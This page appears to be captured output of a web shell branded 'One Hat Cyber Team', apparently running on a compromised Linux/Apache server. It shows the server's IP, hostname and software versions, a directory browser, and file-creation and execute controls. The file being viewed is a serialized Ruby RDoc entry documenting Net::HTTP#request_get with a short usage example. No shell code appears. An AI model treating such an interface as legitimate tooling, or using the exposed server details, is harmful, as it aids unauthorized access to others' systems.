⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.189
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Net
/
HTTP
/
View File Name :
request_get-i.ri
U:RDoc::AnyMethod[iI"request_get:ETI"Net::HTTP#request_get;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"(Sends a GET request to the +path+. ;TI"8Returns the response as a Net::HTTPResponse object.;To:RDoc::Markup::BlankLine o; ; [ I"KWhen called with a block, passes an HTTPResponse object to the block. ;TI";The body of the response will not have been read yet; ;TI"<the block can process it using HTTPResponse#read_body, ;TI"if desired.;T@o; ; [I"Returns the response.;T@o; ; [I"0This method never raises Net::* exceptions.;T@o:RDoc::Markup::Verbatim; [I"0response = http.request_get('/index.html') ;TI"5# The entity body is already read in this case. ;TI" p response['content-type'] ;TI"puts response.body ;TI" ;TI"# Using a block ;TI"1http.request_get('/index.html') {|response| ;TI"" p response['content-type'] ;TI"5 response.read_body do |str| # read body now ;TI" print str ;TI" end ;TI"};T:@format0: @fileI"lib/net/http.rb;T:0@omit_headings_from_table_of_contents_below00I" response;T[[I" get2;To;; [ ;@*;0I"(path, initheader = nil);T@*FI" HTTP;TcRDoc::NormalClass00